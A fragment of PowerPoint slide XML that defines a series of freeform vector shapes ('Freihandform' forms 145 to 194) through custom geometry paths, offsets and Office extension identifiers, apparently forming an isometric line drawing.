              <a:off x="10571295" y="1278526"/>
              <a:ext cx="473090" cy="819790"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191882 w 192004"/>
                <a:gd name="connsiteY0" fmla="*/ 329736 h 332713"/>
                <a:gd name="connsiteX1" fmla="*/ 192006 w 192004"/>
                <a:gd name="connsiteY1" fmla="*/ 107958 h 332713"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 192004"/>
                <a:gd name="connsiteY2" fmla="*/ -2977 h 332713"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="192004" h="332713">
                  <a:moveTo>
                    <a:pt x="191882" y="329736"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="192006" y="107958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2977"/>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46" name="Freihandform: Form 145">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5504BCB0-6514-4AC8-8454-0568ACEC3F7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10571320" y="1141853"/>
              <a:ext cx="236498" cy="683122"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 95984 w 95983"/>
                <a:gd name="connsiteY0" fmla="*/ 274252 h 277246"/>
                <a:gd name="connsiteX1" fmla="*/ 95984 w 95983"/>
                <a:gd name="connsiteY1" fmla="*/ 52474 h 277246"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 95983"/>
                <a:gd name="connsiteY2" fmla="*/ -2994 h 277246"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95983" h="277246">
                  <a:moveTo>
                    <a:pt x="95984" y="274252"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95984" y="52474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="-299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47" name="Freihandform: Form 146">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F17456A-0019-4096-9C9E-2979B407791E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11517340" y="1688304"/>
              <a:ext cx="236520" cy="136437"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 95994 w 95992"/>
                <a:gd name="connsiteY0" fmla="*/ 52402 h 55373"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY1" fmla="*/ -2971 h 55373"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95992" h="55373">
                  <a:moveTo>
                    <a:pt x="95994" y="52402"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2971"/>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48" name="Freihandform: Form 147">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B443384B-35E6-4CE3-9574-8F4DE003DB67}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11044341" y="2098316"/>
              <a:ext cx="473068" cy="136437"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191996 w 191995"/>
                <a:gd name="connsiteY0" fmla="*/ 52437 h 55373"/>
                <a:gd name="connsiteX1" fmla="*/ 95975 w 191995"/>
                <a:gd name="connsiteY1" fmla="*/ -2936 h 55373"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 191995"/>
                <a:gd name="connsiteY2" fmla="*/ 52437 h 55373"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191995" h="55373">
                  <a:moveTo>
                    <a:pt x="191996" y="52437"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95975" y="-2936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="52437"/>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49" name="Freihandform: Form 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8028C3C-7E7C-4672-B378-4170CC78BFF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11044341" y="1961643"/>
              <a:ext cx="236474" cy="546685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 95975 w 95973"/>
                <a:gd name="connsiteY0" fmla="*/ 218943 h 221873"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 95973"/>
                <a:gd name="connsiteY1" fmla="*/ 163474 h 221873"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 95973"/>
                <a:gd name="connsiteY2" fmla="*/ 52538 h 221873"/>
                <a:gd name="connsiteX3" fmla="*/ 95975 w 95973"/>
                <a:gd name="connsiteY3" fmla="*/ -2930 h 221873"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95973" h="221873">
                  <a:moveTo>
                    <a:pt x="95975" y="218943"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="163474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="52538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95975" y="-293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53" name="Freihandform: Form 152">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73A3DE7A-9AB6-40DA-9F31-B5B2F4F90F27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10334866" y="2781441"/>
              <a:ext cx="236451" cy="136432"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95964"/>
                <a:gd name="connsiteY0" fmla="*/ 52493 h 55371"/>
                <a:gd name="connsiteX1" fmla="*/ 95965 w 95964"/>
                <a:gd name="connsiteY1" fmla="*/ -2878 h 55371"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95964" h="55371">
                  <a:moveTo>
                    <a:pt x="1" y="52493"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95965" y="-287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54" name="Freihandform: Form 153">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73E52863-7F1B-4C48-B62F-574E064AA0CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11280839" y="1415195"/>
              <a:ext cx="236545" cy="409546"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96002"/>
                <a:gd name="connsiteY0" fmla="*/ 163233 h 166215"/>
                <a:gd name="connsiteX1" fmla="*/ 96003 w 96002"/>
                <a:gd name="connsiteY1" fmla="*/ 107764 h 166215"/>
                <a:gd name="connsiteX2" fmla="*/ 95984 w 96002"/>
                <a:gd name="connsiteY2" fmla="*/ -2983 h 166215"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96002" h="166215">
                  <a:moveTo>
                    <a:pt x="1" y="163233"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96003" y="107764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95984" y="-2983"/>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55" name="Freihandform: Form 154">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A8F75E6-4014-4451-9F17-18FF8FD8D7B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11517387" y="1414958"/>
              <a:ext cx="236498" cy="136907"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95983"/>
                <a:gd name="connsiteY0" fmla="*/ -2994 h 55564"/>
                <a:gd name="connsiteX1" fmla="*/ 95985 w 95983"/>
                <a:gd name="connsiteY1" fmla="*/ 52570 h 55564"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95983" h="55564">
                  <a:moveTo>
                    <a:pt x="1" y="-2994"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95985" y="5257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56" name="Freihandform: Form 155">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FE5CDE-B520-4FF0-B431-211E4961C528}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11753910" y="1824743"/>
              <a:ext cx="236661" cy="136666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 96051 w 96049"/>
                <a:gd name="connsiteY0" fmla="*/ 52507 h 55466"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 96049"/>
                <a:gd name="connsiteY1" fmla="*/ -2960 h 55466"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96049" h="55466">
                  <a:moveTo>
                    <a:pt x="96051" y="52507"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-296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59" name="Freihandform: Form 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CDBBF4A-E164-42E9-9247-E720956686F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8679158" y="1005182"/>
              <a:ext cx="236545" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96002"/>
                <a:gd name="connsiteY0" fmla="*/ 52439 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 96004 w 96002"/>
                <a:gd name="connsiteY1" fmla="*/ -3029 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96002" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="52439"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96004" y="-3029"/>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60" name="Freihandform: Form 159">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E98C8E2-7E91-474F-8495-FD1B3B8A9F55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11280864" y="2371658"/>
              <a:ext cx="472950" cy="273110"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191949 w 191947"/>
                <a:gd name="connsiteY0" fmla="*/ 52466 h 110842"/>
                <a:gd name="connsiteX1" fmla="*/ 95965 w 191947"/>
                <a:gd name="connsiteY1" fmla="*/ -2907 h 110842"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 191947"/>
                <a:gd name="connsiteY2" fmla="*/ 52562 h 110842"/>
                <a:gd name="connsiteX3" fmla="*/ 95965 w 191947"/>
                <a:gd name="connsiteY3" fmla="*/ 107935 h 110842"/>
                <a:gd name="connsiteX4" fmla="*/ 191949 w 191947"/>
                <a:gd name="connsiteY4" fmla="*/ 52466 h 110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47" h="110842">
                  <a:moveTo>
                    <a:pt x="191949" y="52466"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95965" y="-2907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="52562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95965" y="107935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191949" y="52466"/>
                  </a:lnTo>
                  <a:close/>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75" name="Freihandform: Form 174">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B855DD5E-8214-4B67-A2CC-ED6E34A77F4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11280817" y="2232168"/>
              <a:ext cx="23469" cy="275924"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 109066 h 111984"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -2919 h 111984"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="111984">
                  <a:moveTo>
                    <a:pt x="1" y="109066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2919"/>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82" name="Freihandform: Form 181">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B61C089-D3C0-4733-A854-83EA2B6A5AFC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8915681" y="1141853"/>
              <a:ext cx="22" cy="271464"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 11 w 9"/>
                <a:gd name="connsiteY0" fmla="*/ 107163 h 110174"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9"/>
                <a:gd name="connsiteY1" fmla="*/ -3012 h 110174"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9" h="110174">
                  <a:moveTo>
                    <a:pt x="11" y="107163"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3012"/>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87" name="Freihandform: Form 186">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AD63850-C076-4CAF-9D60-C6A63D92B653}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9625203" y="1824978"/>
              <a:ext cx="236570" cy="818849"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 96013 w 96012"/>
                <a:gd name="connsiteY0" fmla="*/ 273934 h 332331"/>
                <a:gd name="connsiteX1" fmla="*/ 96013 w 96012"/>
                <a:gd name="connsiteY1" fmla="*/ 52538 h 332331"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 96012"/>
                <a:gd name="connsiteY2" fmla="*/ -2930 h 332331"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 96012"/>
                <a:gd name="connsiteY3" fmla="*/ 329401 h 332331"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96012" h="332331">
                  <a:moveTo>
                    <a:pt x="96013" y="273934"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96013" y="52538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="329401"/>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88" name="Freihandform: Form 187">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8806D14-F2A5-460E-987F-22AB45D19392}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9152204" y="2371658"/>
              <a:ext cx="473021" cy="272169"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191977 w 191976"/>
                <a:gd name="connsiteY0" fmla="*/ -2907 h 110460"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 191976"/>
                <a:gd name="connsiteY1" fmla="*/ 107554 h 110460"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191976" h="110460">
                  <a:moveTo>
                    <a:pt x="191977" y="-2907"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="10755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89" name="Freihandform: Form 188">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E85F9098-03EE-49EF-9F1F-4AE1942E2087}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9151923" y="2098082"/>
              <a:ext cx="473255" cy="273573"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 192072 w 192071"/>
                <a:gd name="connsiteY0" fmla="*/ -2930 h 111030"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 192071"/>
                <a:gd name="connsiteY1" fmla="*/ 108100 h 111030"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="192071" h="111030">
                  <a:moveTo>
                    <a:pt x="192072" y="-2930"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="10810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90" name="Freihandform: Form 189">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A945EEC-D689-4774-91FF-D7FB6A1DCD3F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8915706" y="1551868"/>
              <a:ext cx="236567" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96011"/>
                <a:gd name="connsiteY0" fmla="*/ -2983 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 96013 w 96011"/>
                <a:gd name="connsiteY1" fmla="*/ 52486 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96011" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="-2983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96013" y="52486"/>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91" name="Freihandform: Form 190">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD8292E-D469-471C-B220-BD366F5A7EB3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8915706" y="1414958"/>
              <a:ext cx="472691" cy="546685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191844 w 191842"/>
                <a:gd name="connsiteY0" fmla="*/ 218896 h 221873"/>
                <a:gd name="connsiteX1" fmla="*/ 191844 w 191842"/>
                <a:gd name="connsiteY1" fmla="*/ -2977 h 221873"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 191842"/>
                <a:gd name="connsiteY2" fmla="*/ 107863 h 221873"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191842" h="221873">
                  <a:moveTo>
                    <a:pt x="191844" y="218896"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="191844" y="-2977"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="186405" y="262"/>
                    <a:pt x="1" y="107863"/>
                    <a:pt x="1" y="107863"/>
                  </a:cubicBez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92" name="Freihandform: Form 191">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BD653D4-BC72-477A-8D3F-57B4798CA2B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9388705" y="1551868"/>
              <a:ext cx="236663" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 96051 w 96050"/>
                <a:gd name="connsiteY0" fmla="*/ 52486 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 96050"/>
                <a:gd name="connsiteY1" fmla="*/ -2983 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96050" h="55468">
                  <a:moveTo>
                    <a:pt x="96051" y="52486"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2983"/>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95" name="Freihandform: Form 194">
              <a:extLst>
